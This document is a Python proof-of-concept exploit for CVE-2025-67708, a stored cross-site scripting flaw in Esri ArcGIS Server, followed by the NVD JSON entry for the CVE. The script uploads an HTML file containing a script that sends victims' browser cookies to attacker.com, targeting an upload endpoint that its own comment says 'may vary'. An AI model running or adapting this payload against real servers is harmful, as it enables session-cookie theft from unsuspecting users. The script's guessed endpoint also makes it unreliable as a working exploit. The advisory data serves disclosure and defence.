CVE-2025-67708

import requests import sys # CVE-2025-67708 PoC - Stored XSS in Esri ArcGIS Server # Target: Esri ArcGIS Server <= 11.4 TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://target-arcgis-server:6080" # Malicious JavaScript payload for XSS xss_payload = "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>" def exploit_stored_xss(): """ This PoC demonstrates how an unauthenticated attacker can upload files containing malicious JavaScript code to ArcGIS Server. The script will be stored and executed when victims browse the content. """ headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded" } # Attempt to upload malicious file (specific endpoint may vary) upload_endpoint = f"{TARGET}/arcgis/rest/services/upload" data = { "file": ("malicious.html", xss_payload, "text/html"), "description": "Test upload for XSS verification" } try: print(f"[*] Target: {TARGET}") print(f"[*] Uploading malicious payload to {upload_endpoint}") response = requests.post(upload_endpoint, headers=headers, files=data, timeout=30) if response.status_code == 200: print("[+] File uploaded successfully") print(f"[*] Response: {response.text}") print("[*] When victims access the uploaded file, XSS will be triggered") else: print(f"[-] Upload failed with status: {response.status_code}") print(f"[-] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": exploit_stored_xss()

{"cve": {"id": "CVE-2025-67708", "sourceIdentifier": "[email protected]", "published": "2025-12-31T23:15:41.980", "lastModified": "2026-01-06T19:04:52.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser."}, {"lang": "es", "value": "Hay un problema de scripting entre sitios almacenado en Esri ArcGIS Server 11.4 y versiones anteriores en Windows y Linux que en algunas configuraciones permite a un atacante remoto no autenticado almacenar archivos que contienen código malicioso que puede ejecutarse en el contexto del navegador de una víctima."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "11.5", "matchCriteriaId": "EC44DA7C-0CB3-4D79-B502-2B26954DB4DC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}